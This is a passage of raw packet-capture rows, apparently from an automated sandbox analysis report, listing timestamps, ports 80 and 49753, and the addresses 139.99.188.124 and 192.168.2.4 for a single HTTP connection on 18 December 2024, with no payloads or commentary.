                                                                              Dec 18, 2024 21:00:35.045542955 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.045579910 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.047631979 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.047911882 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.158946037 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.159238100 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.159372091 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.163028002 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.252298117 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.252360106 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.252556086 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.254745007 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.254789114 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.255148888 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.265779972 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.265837908 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.266052008 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.274152994 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.274394035 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.274466991 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.283265114 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.283284903 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.283349991 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.290719986 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.290770054 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.291152954 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.297195911 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.297218084 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.297243118 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.305048943 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.305109978 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.305434942 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.316306114 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.316349983 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.316421032 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.324343920 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.324512959 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.324814081 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.373105049 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.374577045 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.375026941 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.375842094 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.378952026 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.466845989 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.466896057 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.467510939 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.469963074 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.470009089 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.470761061 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.475512981 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.475852013 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.475858927 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.481225967 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.481668949 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.481743097 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.486962080 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.487040997 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.487369061 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.492733955 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.493123055 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.493189096 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.498558998 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.498931885 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.498991013 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.504338026 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.504673958 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.504699945 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.510087013 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.510473967 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.510549068 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.514168024 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.514615059 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.514677048 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.518328905 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.518699884 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.519530058 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.522499084 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.522563934 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.522944927 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.526504040 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.526913881 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.527750969 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.530628920 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.530694962 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.530967951 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.534749985 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.534842968 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.535106897 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.538836002 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.539006948 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.539201975 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.543018103 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.543373108 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.543843985 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.547065020 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.547152996 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.547434092 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.551203966 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.551306009 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.680757046 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.681103945 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.681874990 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.683348894 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.683701992 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.683763027 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.684541941 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.686233997 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.686288118 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.686659098 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.688726902 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.688781977 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.689450979 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.692095995 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.692152023 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.692887068 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.695785046 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.695838928 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.697402954 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.698812962 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.698868036 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.699034929 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.701864958 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.701916933 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.702260017 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.705737114 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.705795050 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.706486940 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.708493948 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.708581924 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.708863020 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.711819887 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.711883068 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.712228060 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.715148926 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.715331078 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.715480089 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.718415022 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.718492031 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.718777895 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.721700907 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.721923113 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.722125053 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.725028038 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.725446939 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.725526094 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.728347063 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.728693008 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.728754997 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.731558084 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.731611967 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.731970072 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.734863997 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.735268116 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.736244917 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.738171101 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.738609076 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.738692999 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.741457939 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.741924047 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.743870020 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.744757891 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.745136023 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.746357918 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.748121023 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.748491049 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.751360893 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.751440048 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.751759052 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.754683018 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.755093098 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.755863905 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.757998943 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.758445024 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.759859085 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.761282921 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.761691093 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.762927055 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.764576912 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.765002012 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.767863989 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.767939091 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.768362999 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.771147013 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.771267891 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.771586895 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.774554014 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.774900913 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.775861025 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.895287037 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.895342112 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.895534039 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.896410942 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.896527052 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.897192001 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.899018049 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.899171114 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.899451017 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.901542902 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.901653051 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.901922941 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.904114008 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.904172897 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.904500961 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.906588078 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.906641006 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.907012939 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.909218073 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.909653902 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.909698963 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.911602020 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.911812067 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.912033081 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.914099932 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.914170980 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.914537907 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.917062044 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.917104006 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.917326927 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.919127941 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.919503927 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.919523001 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.921624899 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.921669960 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.922049046 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.924166918 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.924216986 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.924539089 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.926667929 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.926842928 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.927016020 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.929153919 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.929210901 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.929603100 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.931849957 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.931943893 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.932599068 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.934880972 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.934932947 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.935267925 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.937438965 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.937607050 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.937773943 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.939707994 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.939831018 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.939999104 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.941953897 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.942004919 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.942261934 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.944132090 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.944196939 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.944546938 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.946641922 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.946691036 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.947055101 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.949148893 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.949203968 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.949542999 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.951639891 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.951684952 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.952086926 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.954204082 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.954262018 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.954622030 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.956720114 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.956798077 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.957159042 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.959153891 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.959223986 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.959541082 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.961733103 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.961785078 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.962095976 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.964238882 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.964304924 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.964597940 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.966667891 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.966723919 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.967053890 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.969218969 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.969279051 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.969706059 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.971770048 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.971818924 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.972120047 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.974205017 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.974402905 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.974558115 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.976696014 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.976751089 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.977085114 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.979201078 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.979262114 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.979592085 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.981699944 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.981760025 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.982100964 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.984208107 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.984491110 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.984627962 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.986720085 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.986915112 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.987077951 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.989200115 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.989260912 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.989649057 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.991784096 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.991835117 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.992192984 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.994270086 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.994328976 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.994678974 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.996769905 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.996839046 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.997185946 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.999224901 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:35.999265909 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:35.999643087 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.001808882 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.001857042 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.002176046 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.004353046 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.004707098 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.004759073 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.006753922 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.006802082 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.007198095 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.009294987 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.009342909 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.009758949 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.011785030 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.011867046 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.012243986 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.014297009 CET8049753139.99.188.124192.168.2.4
